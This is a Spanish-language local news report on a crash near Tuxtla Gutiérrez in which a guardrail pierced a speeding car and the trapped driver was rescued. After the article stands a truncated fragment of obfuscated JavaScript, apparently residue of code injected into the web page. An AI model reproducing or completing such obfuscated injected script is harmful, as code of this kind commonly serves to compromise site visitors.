En fuerte accidente barra metálica atraviesa unidad

Jairo Camacho.

Agencia ReporteCiudadano, 9 de marzo del 2025. Tuxtla Gutiérrez.- Un fuerte accidente se registró este domingo por la mañana en el tramo Tuxtla- Berriozábal cuando el conductor de una unidad particular se estrelló contra la barra metálica de contención y fue atravesada.

De acuerdo con los reportes oficiales este hecho ocurrió cuando el conductor circulaba a exceso de velocidad rumbo a la capital chiapaneca y perdió el control saliéndose a la cuneta.

Avanzó varios metros y se estrelló contra la barra metálica que atravesó la unidad

El conductor quedó atrapado entre los fierros retorcidos y fue rescatado por socorristas con equipo especializado.

Finalmente el sujeto fue trasladado a un nosocomio y la unidad fue remolcado a un corralón en turno para deslindar responsabilidades.

(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return

About Agencias Reporte Ciudadano Chiapas

Check Also

Particular embiste a motociclista en la Calzada Samuel León Brindis

Jairo Camacho. Agencia ReporteCiudadano, 15 de diciembre del 2025. Tuxtla Gutiérrez.- Este viernes un motociclista …

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *